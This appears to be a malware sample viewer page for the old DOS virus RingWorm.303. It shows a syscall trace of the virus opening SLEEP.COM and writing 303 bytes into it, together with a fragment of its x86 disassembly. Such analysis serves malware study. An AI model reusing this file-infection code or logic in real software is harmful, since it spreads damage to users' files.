Sample viewer

vx.netlux.org/Virus.DOS.RingWorm.303.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:54:57.061652338Z 78 PC: 12aac | Find first file
2018-12-17T22:54:57.075527231Z 61 PC: 12ab6 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:54:57.085679233Z 63 PC: 12ac1 | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:54:57.109974272Z 44 PC: 12ae2 | Get time 0x12ae2: mov word ptr [0x21f], dx
0x12ae6: mov ax, 0x4200
0x12ae9: xor cx, cx
0x12aeb: cdq
0x12aec: int 0x21
0x12aee: mov ah, 0x40
0x12af0: mov cx, 0x12f
0x12af3: mov dx, 0x100
0x12af6: pushaw
0x12af7: jmp 0x12b70
0x12af9: int 0x20
0x12afb: mov ah, 0x3e
0x12afd: int 0x21
0x12aff: mov ah, 0x4f
0x12b01: int 0x21
0x12b03: jmp 0x12aac
0x12b05: mov ax, 0x206
0x12b08: call ax
0x12b0a: popaw
0x12b0b: int 0x21
2018-12-17T22:54:57.12184456Z 66 PC: 12aee | Move file pointer
2018-12-17T22:54:57.129767906Z 64 PC: 12b78 | Write file or device (Write 303 bytes on handle 5)
2018-12-17T22:54:57.1324217Z 62 PC: 12b7c | Close file